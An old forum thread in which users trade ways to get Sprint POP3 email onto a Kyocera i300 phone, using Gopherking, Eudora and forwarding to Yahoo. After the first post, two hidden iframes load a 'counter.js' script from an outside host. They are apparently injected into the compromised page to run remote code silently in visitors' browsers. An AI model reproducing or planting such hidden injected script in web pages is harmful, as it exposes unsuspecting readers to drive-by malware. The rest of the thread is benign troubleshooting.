+ Reply to Thread

Question anyone download sprint email

anyone try to set up a sprint email download to the i300? is this even possible? I got set up on gopherking - but it does not have settings for the sprint email pop3 server - so I am at a dead end.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

perhaps im slow,

but why do you need it when you can acces it form the sprint web pqa?

...and Sprint notifies me of new emails and the subject anyway.

Do you guys actually read your email while you are connected burning up minutes? Marc, I know you have a zillion minutes a month, but is it not more effective to be able to do it off line. You could write a bunch of emails on the phone on an airplane, or read and reply. Can't do that with the PQA. I like POP3 much better. Isn't reading the mail with the browser slow?
    Carl

Originally posted by CarlGalgano
    Do you guys actually read your email while you are connected burning up minutes? Marc, I know you have a zillion minutes a month, but is it not more effective to be able to do it off line. You could write a bunch of emails on the phone on an airplane, or read and reply. Can't do that with the PQA. I like POP3 much better. Isn't reading the mail with the browser slow?
    What he said. I gotta say that I really prefer POP mail over web-based.... Can do a whole heckuva lot more with POP than with web-based, incl the off-line reading/writing as Carl mentioned...

Cliff

Successfully configured email

Out of the box, I could only get email through sprint. When I tried to get my mail from my home server I ran into a problem. Sprint's SMTP server wouldn't let me send email.

Solution: I downloaded Eudora Internet Suite. Then I configured my server to accept relaying from the first two octects of the IP address that is assigned at dial-up. This way I could send mail through my server. Getting mail through any POP account is not a problem at all.

If you don't have a home server that you can do as you please, you should be able to find a server that you can relay through.

I agree somewhat with the other posts here. Writing and sending email through your palm is really only something to do for the sake of doing it. That doesn't matter to me. I'm always looking to conquer the cool things that can be done then I'll move on to the next killer app/feature.

Brian

sprint email heaven

Just got the solution. I forward all of my sprint email to a new email account I set for free at yahoo but I use my sprint email account - so it hits my phone whenever I get mail. I installed Eudora 2.1 pqa - and configured it to access yahoo mail - very easy since yahoo mail has all the intructions for eudora config on their email help tab.

Now, I get a message on the i300 when I get mail to my sprint email account - it gets forwarded to yahoo; and I can go online on the i300 to send/receive and load into the i300.

Big save on sprint minutes - now I can compose & read offline.

I'm happy

Be mindful of Sprint message charges!!

... don't forget that every time you get a message notification on your phone from Sprint that it counts towards 50/month limit. Anything over 50 and you get hit with a per-message charge... can add up in a hurry big-time!

Administrator

Arrow

u dont have to use the sprint mail.. you can use msn, hotmail, yahoo... i have several addys not counting the sprint, which i never use, as i use my yahoo more and msn second...